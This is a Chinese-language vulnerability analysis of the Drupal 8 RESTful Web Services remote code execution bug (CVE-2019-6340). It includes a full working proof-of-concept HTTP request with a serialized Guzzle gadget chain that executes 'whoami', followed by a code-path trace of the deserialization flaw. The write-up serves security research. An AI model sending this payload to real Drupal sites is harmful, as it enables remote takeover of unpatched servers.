Drupal Core RESTful RCE (CVE-2019-6340)

近日，Drupal官方更新了一个非常关键的安全补丁，修复了因为接受的反序列化数据过滤不够严格，在开启RESTful Web Services拓展模块的情况下，可能导致 PHP 代码执行的严重安全。

漏洞条件

根据官方公告和自身实践，8.6.X(<8.6.10)两种情况可能导致问题出现：

• RESTful Web Services 拓展开启，并且启用了REST resources（默认配置即可），不需要区分GET，POST等方法即可完成攻击。

• JSON:API服务模块开启，此服务尚未分析。

攻击步骤

这里使用drupal-8.6.5作为测试版本，搭建REST服务进行漏洞分析

配置RESTful服务

在拓展中安装RESTful对应的WEB服务

RESTful服务开启后，对于REST resources的设置比较麻烦，安装REST UI拓展进行图形化的管理，方便查看（不安装也是可以的）。

RESTful服务开启后，其中/node/{node}这个REST resources是默认配置中就启用的，可以通过REST UI查看，发现确实如此，默认配置即可被攻击者利用。

攻击验证

发送包含whoami系统验证指令的攻击数据包

GET /drupal/node/1?_format=json HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/hal+json
Connection: close
Content-Length: 637
{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:6:\"whoami\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://127.0.0.1/drupal/rest/type/shortcut/default"
    }
  }
}

漏洞分析

官方公告中(现已修正)一开始仅仅说开启POST/PATCH两种请求方式才会收到攻击，其实并不区分类型，上图就是GET请求的攻击，因为程序在进入在对请求进行deserialize的时候，是还是通过php://input进行获取请求内容。

跟进$request->getContent

获得请求内容后，使用$this->serializer->decode对请求内容进行解码并赋值$unserialized。

然后传入$this->serializer->denormalize函数，Drupal 8的Serialization API是主要基于Symfony Serializer组件，具体可参加文档。

一路跟进直到getTypeInternalIds函数，检查url是否是网站已知的类型。

继续跟进，真正的判断在这个位置，函数栈如下：

继续跟进，将结果变量$typed_data_ids['entity_type']传入getEntityTypeDefinition函数，取实体的定义类型。

继续跟进，此时$context['target_instance']中包含Drupal\Core\Field\FieldItemList的实例。

继续跟进，经过$items->appendItem()后，$context['target_instance']被重新赋值，此时包含Drupal\link\Plugin\Field\FieldType\LinkItem的实例。

继续跟进，将$context['target_instance']中的实例赋值给$field_item，然后调用$field_item->setValue方法，并传入了$data。

data的值如下：

继续跟进setValue函数，这里的$values['options']可控，找到反序列化漏洞的触发点。

利用Drupal自带的Guzzle库，FnStream类的析构函数中包含call_user_func，进行利用链的构造。